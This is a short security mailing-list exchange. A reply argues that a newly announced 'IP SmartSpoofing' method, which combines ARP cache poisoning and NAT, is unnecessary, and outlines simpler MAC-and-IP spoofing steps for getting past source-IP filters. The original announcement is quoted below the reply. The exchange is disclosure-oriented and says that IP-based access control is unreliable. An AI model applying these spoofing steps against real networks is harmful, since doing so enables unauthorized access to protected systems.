Re: IP SmartSpoofing : How to bypass all IP filters relying on source IP address

["Ossian Vitek" <ian.Vitek () ixsecurity com>]

The only new is that the attacker relays the packets from the trusted
client.
This is not needed for the spoof.
The solution in the defcon 8 presentation is far more easier.
You do not need to arpspoof and NAT.
* Spoof trusted client on the same LAN:
  Just take the MAC and IP of the trusted host.
* Spoof an upstream trusted client:
  Just take the MAC of the upstream router and the IP of the
  trusted client.

Defcon 8:
http://www.defcon.org/html/defcon-8/defcon-8-post.html
Read "Full Connection Vanilla IP-Spoof" in the presentation at:
http://www.wittys.com/files/defcon_vitek.ppt

All responses containing:
1: "But on a switched environment ..."
2: "But if you take same MAC as the ..."
will be redirected to /dev/null

//Ian Vitek, iXsecurity
mailto:ian.vitek () ixsecurity com





Hi,

In an article available at
http://www.althes.fr/ressources/avis/smartspoofing.htm, we describe a new
technique for spoofing an IP address using ARP cache poisoning and network
translation. The IP smart spoofing allows to run any application with a
spoofed IP address and thus, bypass many access control based on source IP
address. As a result, we will explain why IP based access control is not
reliable on firewalls, routers or applications.


Regards,

Laurent Licour (llicour () althes fr) & Vincent Royer (vroyer () althes fr)
http://www.althes.fr